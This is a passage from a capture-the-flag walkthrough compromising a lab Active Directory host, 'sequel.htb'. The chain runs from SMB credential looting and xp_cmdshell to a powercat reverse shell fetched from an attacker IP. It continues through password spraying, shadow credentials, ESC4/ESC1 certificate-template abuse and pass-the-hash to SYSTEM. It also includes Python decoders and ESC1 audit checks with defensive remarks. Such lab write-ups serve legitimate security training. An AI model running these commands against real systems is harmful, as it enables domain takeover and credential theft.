        SYSVOL                                                  READ ONLY       Logon server share
        Users                                                   READ ONLY

We have read access to several shares; let's begin with the "Users" share.

> smbclient \\\\sequel.htb\\Users -U "rose%KxEPkKe6R8su"
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sun Jun  9 14:42:11 2024
  ..                                 DR        0  Sun Jun  9 14:42:11 2024
  Default                           DHR        0  Sun Jun  9 12:17:29 2024
  desktop.ini                       AHS      174  Sat Sep 15 08:16:48 2018
 
                6367231 blocks of size 4096. 908717 blocks available

Nothing useful here; move on to the next share.

> smbclient "\\\\sequel.htb\\Accounting Department" -U "rose%KxEPkKe6R8su"
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Jun  9 11:52:21 2024
  ..                                  D        0  Sun Jun  9 11:52:21 2024
  accounting_2024.xlsx                A    10217  Sun Jun  9 11:14:49 2024
  accounts.xlsx                       A     6780  Sun Jun  9 11:52:07 2024
 
                6367231 blocks of size 4096. 908717 blocks available

Download both files. accounts.xlsx contains several usernames and passwords, including what looks like the password of the MSSQL sa account.

USER

We now have what seems to be the MSSQL sa password; try it with Impacket's mssqlclient.py. sa is a SQL login, so this is SQL authentication (no -windows-auth flag).

> python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py sequel.htb/sa:'<password>'@10.10.11.51

Once inside, the first step is to enable xp_cmdshell. mssqlclient.py has a built-in helper that issues the required sp_configure calls for us; this needs the sysadmin role, which sa has.

> enable xp_cmdshell

It is now enabled, so we can run OS commands through xp_cmdshell. First turn off QUOTED_IDENTIFIER so that double-quoted text is treated as a string literal rather than an identifier; otherwise the double quotes around the command below would break the query.

> SET QUOTED_IDENTIFIER OFF

And now we can launch our favorite reverse shell.

> exec xp_cmdshell "powershell iex(new-object net.webclient).downloadstring('http://<ip address>/powercat.ps1');powercat -c <ip address> -p 1919 -e cmd"

A reverse shell for user sql_svc is received on port 1919.

Since a database is running on the host, the next step is to look for its configuration files on disk. The unattended-install answer file at c:\sql2019\expressadv_enu\sql-configuration.ini contains the SQL service account password and the sa password in clear text (values blanked below).

> type c:\sql2019\expressadv_enu\sql-configuration.ini
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD=
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD=
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True

Since we have a username list from the earlier RID brute force, spray the service account password found in the configuration file across it; password reuse between service accounts and user accounts is common.

> crackmapexec smb sequel.htb -u userlist -p '<password>'

The password is valid for the user ryan, and that account is allowed to use WinRM (port 5985 was open in the scan), so we can open an Evil-WinRM session with it.

From that session we collect the user flag.

SYSTEM

Start from the ryan shell and take the opportunity to enumerate the system.

> Get-ComputerInfo
 
WindowsBuildLabEx                                       : 17763.1.amd64fre.rs5_release.180914-1434
WindowsCurrentVersion                                   : 6.3
WindowsEditionId                                        : ServerStandard
WindowsInstallationType                                 : Server
WindowsInstallDateFromRegistry                          : 6/8/2024 4:32:20 PM
WindowsProductId                                        : 00429-00521-62775-AA352
WindowsProductName                                      : Windows Server 2019 Standard
WindowsRegisteredOwner                                  : Windows User
WindowsSystemRoot                                       : C:\Windows
WindowsVersion                                          : 1809

AD CS is also installed on the host: querying the Public Key Services container returns the enterprise CA sequel-DC01-CA, which matches the issuer of the LDAP certificate seen in the port scan.

> Get-ADObject -Filter {objectClass -eq "certificationAuthority"} -SearchBase "CN=Public Key Services,CN=Services,CN=Configuration,DC=sequel,DC=htb"

DistinguishedName                                                                                                   Name               ObjectClass            ObjectGUID
-----------------                                                                                                   ----               -----------            ----------
CN=sequel-DC01-CA,CN=Certification Authorities,CN=Public Key Services,CN=Services,CN=Configuration,DC=sequel,DC=htb sequel-DC01-CA     certificationAuthority 94fe122e-5619-48b2-b0f6-194fbd276cac
CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=sequel,DC=htb                          NTAuthCertificates certificationAuthority 3968134c-0918-4117-acfe-cb97bebaff43
CN=sequel-DC01-CA,CN=AIA,CN=Public Key Services,CN=Services,CN=Configuration,DC=sequel,DC=htb                       sequel-DC01-CA     certificationAuthority 81cc117d-fd4e-4a56-82c0-92d9e0753b60

The next step is AD enumeration with BloodHound CE. Installation and configuration notes for this tool are in the Certified writeup. There we used BloodHound-Python as a remote collector; here, since we already have a shell on the host, we use the SharpHound local collector for the sake of testing different tools.

We need to use a SharpHound CE version developed for BloodHound CE, otherwise the data ingestion will fail. The appropriate version can be downloaded from the application GUI itself in Settings → Download Collectors.

Drop a copy of SharpHoundCE.exe in the host and collect the data.

> .\sharphoundCE.exe --collectionmethods all
2025-01-19T09:04:10.5455220-08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-01-19T09:04:10.7330116-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2025-01-19T09:04:10.7642664-08:00|INFORMATION|Initializing SharpHound at 9:04 AM on 1/19/2025
2025-01-19T09:04:10.7955042-08:00|INFORMATION|Resolved current domain to sequel.htb
2025-01-19T09:04:18.7642682-08:00|INFORMATION|Loaded cache with stats: 62 ID to type mappings.
 62 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2025-01-19T09:04:18.7955131-08:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2025-01-19T09:04:18.9053203-08:00|INFORMATION|Beginning LDAP search for sequel.htb
2025-01-19T09:04:18.9830057-08:00|INFORMATION|Beginning LDAP search for sequel.htb Configuration NC
2025-01-19T09:04:18.9986277-08:00|INFORMATION|Producer has finished, closing LDAP channel
2025-01-19T09:04:18.9986277-08:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-01-19T09:04:19.0299113-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SEQUEL.HTB
2025-01-19T09:04:19.0299113-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SEQUEL.HTB
2025-01-19T09:04:19.1861317-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SEQUEL.HTB
2025-01-19T09:04:20.2642542-08:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2025-01-19T09:04:20.2955073-08:00|INFORMATION|Output channel closed, waiting for output task to complete
2025-01-19T09:04:20.5767600-08:00|INFORMATION|Status: 348 objects finished (+348 348)/s -- Using 39 MB RAM
2025-01-19T09:04:20.5767600-08:00|INFORMATION|Enumeration finished in 00:00:01.6938162
2025-01-19T09:04:20.6705151-08:00|INFORMATION|Saving cache with stats: 62 ID to type mappings.
 63 name to SID mappings.
 1 machine sid mappings.
 4 sid to domain mappings.
 0 global catalog mappings.
2025-01-19T09:04:20.6861293-08:00|INFORMATION|SharpHound Enumeration Completed at 9:04 AM on 1/19/2025! Happy Graphing!

Upload the ZIP to BloodHound CE and look at the graph: ryan has WriteOwner over the user ca_svc. Clicking on the edge shows the abuse information in the application itself.

Essentially, it is the same chain as in Certified: first we take ownership of the ca_svc account, then we use that ownership to grant ourselves full control over it, and finally we perform a shadow credentials attack to obtain the account's NT hash.

Let's begin by taking ownership of the account.

> python3 /usr/share/doc/python3-impacket/examples/owneredit.py -action write -new-owner ryan -target ca_svc 'sequel.htb/ryan:<password>'

Then abuse the ownership to grant ourselves full control by editing the DACL.

> python3 /usr/share/doc/python3-impacket/examples/dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'<password>'

Now we are in a position to perform a shadow credential attack and dump ca_svc user NT hash.

In summary, full control over an account (specifically, write access to its msDS-KeyCredentialLink LDAP attribute) lets us add a key credential to it. This attribute normally stores the public keys of Windows Hello for Business or device credentials associated with a user or computer object. We store a key pair of our own there as an alternate credential in the form of a certificate, and the DC then accepts PKINIT pre-authentication with the matching private key. We can use that to request a TGT on behalf of the account or to recover its NT hash.

This can be done with pyWhisker and PKINITtools (see Certified), or with Certipy, which automates the shadow credentials attack in a single command and dumps the hash. The ntpdate call syncs our clock with the DC first: the scan showed a clock skew, and Kerberos rejects requests whose timestamps fall outside its tolerance.

> sudo ntpdate 10.10.11.51 && certipy shadow auto -u ryan@sequel.htb -p '<password>' -dc-ip 10.10.11.51 -ns 10.10.11.51 -target dc01.sequel.htb -account ca_svc
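
The attribute written by the shadow credentials step is opaque in LDAP output. The decoder below is an added example for this writeup, not code from Certipy or pyWhisker: it builds a minimal KEYCREDENTIALLINK_BLOB the way Whisker-style tooling does, wraps it in the LDAP DN-Binary syntax, and parses it back into named entries. The key bytes, device GUID, timestamp and the CN=Users location of ca_svc are assumptions, and the KeyHash and CustomKeyInformation entries real tooling also writes are omitted for brevity.

```python
import hashlib
import struct
from datetime import datetime, timedelta, timezone

# KEYCREDENTIALLINK_BLOB layout (MS-ADTS 2.2.20): a 4-byte version followed by
# entries of 2-byte little-endian length, 1-byte identifier and value.
KEYCREDENTIALLINK_VERSION = 0x00000200
ENTRY_NAMES = {
    0x01: "KeyID", 0x02: "KeyHash", 0x03: "KeyMaterial", 0x04: "KeyUsage",
    0x05: "KeySource", 0x06: "DeviceId", 0x07: "CustomKeyInformation",
    0x08: "KeyApproximateLastLogonTimeStamp", 0x09: "KeyCreationTime",
}
KEY_USAGE_NGC = 0x01   # usage value shadow-credential tooling writes
KEY_SOURCE_AD = 0x00
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def datetime_to_filetime(dt: datetime) -> bytes:
    """Aware datetime -> Windows FILETIME (100 ns ticks since 1601), integer math only."""
    delta = dt - FILETIME_EPOCH
    ticks = (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10
    return struct.pack("<Q", ticks)


def filetime_to_datetime(raw: bytes) -> datetime:
    ticks, = struct.unpack("<Q", raw)
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def parse_dn_binary(value: str) -> tuple[bytes, str]:
    """Split an LDAP DN-Binary value 'B:<hex digit count>:<hex>:<DN>' into (blob, DN)."""
    tag, count, hexdata, dn = value.split(":", 3)
    if tag != "B" or int(count) != len(hexdata):
        raise ValueError("malformed DN-Binary value")
    return bytes.fromhex(hexdata), dn


def parse_key_credential_link(blob: bytes) -> dict:
    """Decode one KEYCREDENTIALLINK_BLOB into {entry name: value}."""
    version, = struct.unpack_from("<I", blob, 0)
    if version != KEYCREDENTIALLINK_VERSION:
        raise ValueError(f"unsupported KeyCredentialLink version 0x{version:08x}")
    entries, offset = {}, 4
    while offset < len(blob):
        length, ident = struct.unpack_from("<HB", blob, offset)
        offset += 3
        raw = blob[offset:offset + length]
        if len(raw) != length:
            raise ValueError("truncated entry")
        offset += length
        name = ENTRY_NAMES.get(ident, f"Unknown(0x{ident:02x})")
        if ident in (0x04, 0x05):            # single-byte enums
            entries[name] = raw[0]
        elif ident in (0x08, 0x09):          # FILETIME timestamps
            entries[name] = filetime_to_datetime(raw)
        else:                                # KeyID, KeyMaterial, DeviceId, ...
            entries[name] = raw
    return entries


def build_key_credential_link(public_key_der: bytes, device_id: bytes, created: datetime) -> bytes:
    """Minimal entry set in the order Whisker-style tools write it (KeyID is SHA-256 of the key)."""
    def entry(ident: int, value: bytes) -> bytes:
        return struct.pack("<HB", len(value), ident) + value
    return (struct.pack("<I", KEYCREDENTIALLINK_VERSION)
            + entry(0x01, hashlib.sha256(public_key_der).digest())
            + entry(0x03, public_key_der)
            + entry(0x04, bytes([KEY_USAGE_NGC]))
            + entry(0x05, bytes([KEY_SOURCE_AD]))
            + entry(0x06, device_id)
            + entry(0x09, datetime_to_filetime(created)))


def to_dn_binary(blob: bytes, dn: str) -> str:
    hexdata = blob.hex().upper()
    return f"B:{len(hexdata)}:{hexdata}:{dn}"


# Constructed sample: placeholder key bytes, fixed device GUID and timestamp,
# and an assumed DN for ca_svc (the real object may live in another container).
SAMPLE_KEY = bytes(range(48))
SAMPLE_DEVICE_ID = bytes.fromhex("00112233445566778899aabbccddeeff")
SAMPLE_CREATED = datetime(2025, 1, 19, 17, 10, 0, tzinfo=timezone.utc)
SAMPLE_DN = "CN=ca_svc,CN=Users,DC=sequel,DC=htb"
SAMPLE_VALUE = to_dn_binary(build_key_credential_link(SAMPLE_KEY, SAMPLE_DEVICE_ID, SAMPLE_CREATED), SAMPLE_DN)

if __name__ == "__main__":
    blob, dn = parse_dn_binary(SAMPLE_VALUE)
    for name, value in parse_key_credential_link(blob).items():
        print(f"{name:35} {value.hex() if isinstance(value, bytes) else value}")
    print("target:", dn)
```

On the defensive side, the same decoder applied to the real attribute value (or to the new value logged in a Directory Service event 5136 on the DC) shows a freshly created entry with a DeviceId that matches no enrolled device and a KeyCreationTime that coincides with the attacker's activity; accounts like ca_svc that never use Windows Hello should have no entries at all.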

We cannot use this hash to open a WinRM session as ca_svc, but we can use it remotely with Certipy to look for vulnerable certificate templates.

> certipy find -u ca_svc@sequel.htb -hashes <nt hash> -dc-ip 10.10.11.51 -vulnerable -stdout

Certipy reports the template DunderMifflinAuthentication as vulnerable to ESC4, which means a low-privileged principal has excessive rights (full control) over the template object. Here SEQUEL.HTB\Cert Publishers holds those rights, and the ca_svc account we now control has them through that group, so we can rewrite the template into an ESC1 configuration: enrollee supplies the subject, client authentication EKU, no manager approval and no required signatures.

> certipy template -username ca_svc@sequel.htb -hashes <nt hash> -template DunderMifflinAuthentication -save-old

The certificate template is now vulnerable to the ESC1 technique. The -save-old flag writes the original configuration to a JSON file; restore it when you are done by passing that file back to the template command with the -configuration option, since leaving the template open affects every other user of the CA.
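
To make the ESC4 to ESC1 step concrete, the following added example (mine, not code from the writeup or from Certipy) encodes the ESC1 preconditions as checks over a template's LDAP attributes and shows a constructed before/after configuration for DunderMifflinAuthentication. The "before" values are an assumption, since the writeup never prints the original template; the enrollment-ACL result is passed in as a precomputed boolean because resolving nTSecurityDescriptor is outside the example. The flag constants follow MS-CRTD, and rewrite_for_esc1 approximates the attributes certipy template writes rather than reproducing its exact configuration.

```python
# Flag bits from MS-CRTD (the certificate-template schema) that drive ESC1.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001        # msPKI-Certificate-Name-Flag
CT_FLAG_SUBJECT_ALT_REQUIRE_UPN = 0x02000000          # msPKI-Certificate-Name-Flag
CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH = 0x80000000   # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002                # msPKI-Enrollment-Flag (manager approval)

# EKUs that make a certificate usable for domain authentication (PKINIT/Schannel).
AUTHENTICATION_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}


def esc1_conditions(template: dict) -> dict:
    """Evaluate each ESC1 precondition on a template given as its LDAP attributes.
    'low_privileged_can_enroll' and 'published' are precomputed inputs (ACL and
    CA-publication lookups are outside this example)."""
    name_flags = template.get("msPKI-Certificate-Name-Flag", 0)
    enroll_flags = template.get("msPKI-Enrollment-Flag", 0)
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    return {
        "enrollee_supplies_subject": bool(name_flags & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "no_manager_approval": not (enroll_flags & CT_FLAG_PEND_ALL_REQUESTS),
        "no_authorized_signatures": template.get("msPKI-RA-Signature", 0) == 0,
        # An empty EKU list means the certificate is valid for any purpose.
        "authentication_eku": not ekus or bool(ekus & AUTHENTICATION_EKUS),
        "low_privileged_can_enroll": bool(template.get("low_privileged_can_enroll", False)),
        "published": bool(template.get("published", False)),
    }


def is_esc1(template: dict) -> bool:
    return all(esc1_conditions(template).values())


def rewrite_for_esc1(template: dict) -> dict:
    """What an ESC4 holder does to a template: SAN controlled by the requester,
    no approval or signatures, a client-auth EKU, and enrollment open to everyone."""
    weakened = dict(template)
    weakened.update({
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "msPKI-Enrollment-Flag": 0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "low_privileged_can_enroll": True,
    })
    return weakened


# Constructed "before" state: a sane authentication template whose subject and
# SAN are built by the CA from the AD object, with manager approval required.
DUNDER_MIFFLIN_BEFORE = {
    "name": "DunderMifflinAuthentication",
    "published": True,
    "msPKI-Certificate-Name-Flag": CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH | CT_FLAG_SUBJECT_ALT_REQUIRE_UPN,
    "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "low_privileged_can_enroll": False,
}
DUNDER_MIFFLIN_AFTER = rewrite_for_esc1(DUNDER_MIFFLIN_BEFORE)

if __name__ == "__main__":
    for label, tpl in (("before", DUNDER_MIFFLIN_BEFORE), ("after", DUNDER_MIFFLIN_AFTER)):
        unmet = [name for name, ok in esc1_conditions(tpl).items() if not ok]
        print(f"{label}: ESC1={is_esc1(tpl)} unmet={unmet}")
```

The "after" dictionary is also what an auditor should look for: an authentication EKU together with CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT and no approval on a template that low-privileged principals can enroll in. Re-running the checks against the restored template (the JSON written by -save-old) confirms the cleanup.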

We can now request a certificate from this template and specify an arbitrary SAN with either the -upn or the -dns parameter; here we ask for one identifying the administrator.

> certipy req -username ca_svc@sequel.htb -hashes <nt hash> -ca sequel-DC01-CA -target DC01.sequel.htb -template DunderMifflinAuthentication -upn administrator@sequel.htb -dc-ip 10.10.11.51

And with this certificate, authenticate through PKINIT to obtain a TGT for administrator and dump the administrator's NT hash.

> certipy auth -pfx ./administrator.pfx -dc-ip 10.10.11.51

The only thing left is to open a shell by passing the hash (the LM part can be left empty; only the NT hash matters).

> python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes <lm hash>:<nt hash> sequel.htb/administrator@sequel.htb

psexec.py lands us as NT AUTHORITY\SYSTEM, and the root flag is ours.

REFERENCES

https://i-tracing.com/blog/dacl-shadow-credentials/

https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf

https://github.com/ly4k/Certipy?tab=readme-ov-file#esc4
